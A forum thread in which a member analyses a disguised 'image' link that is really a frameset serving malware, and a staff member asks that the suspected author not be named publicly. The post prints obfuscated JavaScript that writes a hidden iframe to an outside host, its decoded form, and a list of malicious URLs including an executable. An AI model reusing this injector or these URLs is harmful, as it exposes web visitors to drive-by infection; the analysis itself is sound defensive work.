Jump to content

Website not block?

Rainbow1112

By Rainbow1112
in Website Blocking

 Share

Recommended Posts

MysteryFCM

MysteryFCM

Posted
Posted

The image contains the following, showing it's not actually an image;

<frameset rows=170,* border=0><frame name=top src=dl.php?i= noresize border=0><frame name=main src=dl2.php noresize border=0><frame name=main2 src=dl3.php noresize border=0></frameset>

dl.php leads to a file called codec.jpg, which yep, you've guessed, isn't an image (haven't checked the file itself yet but initial inspection shows it's likely an exploit)

dl2.php contains;

var hzhmJvuTddki4h9S1V2lWN = '%3C%69%66';var nt4ha1a6tF9xId7KF4JrYcnlL6H55 = '%72';var eLs3w37pxu = '%61%6D%65%20%6E%61%6D%65%3D%22';var woBcX46Ly93iN9GNqp6DPmH7kcjaf3 = '%75%34%49%68%53%47%67%67%63%74%33%33%34%65%33%67%63%47%51%78%43%70%46%41%69';var il3eaHJqew4PQ5pfyzeVkHl3 = '%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%30%22';var neq7X = '%73%72%63%3D%22';var ylxQinb2no1necna25017K830un9 = '%68%74%74%70%3A%2F%2F';var o411mcr = '66.225.219.106/images/banner.php';var hK7Rhc6ZpVwlsf0262Vr6f5mlMk4935r8 = '%22%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%22%31%22%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%22%30%22%20%74%69%74%6C%65%3D%22';var zsv8o = '%75%36%48%41%56';var jOL69u4a5510Dizgej = '%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%62%6F%72%64%65%72%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E';var rqrsp56oHj = '%3C%69%66';var ryuO29Suj9dyfdpd6817RZBX4wJy3Az9i = '%72%61';var mHhUvkloet4YxI = '%6D%65%3E';var llk96Fte6nyMphufq7xTJ8Q3f29oS=new Array();llk96Fte6nyMphufq7xTJ8Q3f29oS[0]=new Array(hzhmJvuTddki4h9S1V2lWN+nt4ha1a6tF9xId7KF4JrYcnlL6H55+eLs3w37pxu+woBcX46Ly93i
N9GNqp6DPmH7kcjaf3+il3eaHJqew4PQ5pfyzeVkHl3+neq7X+ylxQinb2no1necna25017K830un9+o
4
11mcr+hK7Rhc6ZpVwlsf0262Vr6f5mlMk4935r8+zsv8o+jOL69u4a5510Dizgej+rqrsp56oHj+ryuO
2
9Suj9dyfdpd6817RZBX4wJy3Az9i+mHhUvkloet4YxI);srAGioVkn2Zzu1n0PV3=unescape(llk96Fte6nyMphufq7xTJ8Q3f29oS);document.write(srAGioVkn2Zzu1n0PV3)
;

Which decodes to;

<iframe name="u4IhSGggct334e3gcGQxCpFAi" width="1" height="0"src="http://66.225.219.106/images/banner.php" marginwidth="1" marginheight="0" title="u6HAV" scrolling="no" border="0" frameborder="0"><iframe>

banner.php isn't returning any actual content for me at present.

dl3.php contains the executable itself, as referenced by Falkra

/edit

For ease, the following are the list of URL's;

http://66.225.219.106/images/banner.php
http://img194.imagshack.net/img194/1362/DSC0020090829.JPG/dl3.php
http://img194.imagshack.net/img194/1362/DSC0020090829.JPG/dl2.php
http://img194.imagshack.net/img194/1362/DSC0020090829.JPG/dl.php?i=
http://img194.imagshack.net/img194/1362/DSC0020090829.JPG/codec.jpg
http://img194.imagshack.net/img194/1362/DSC0020090829.JPG/IMG000020096253-BMP.EXE

Link to post
Share on other sites
  • Staff
TeMerc

TeMerc

Posted
  • Staff
Posted
Guys i think i know the guy who made this worm. Can i post the name and information how i figure it out ?
No, please do not. Feel free to send it via PM tho to me tho.
Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.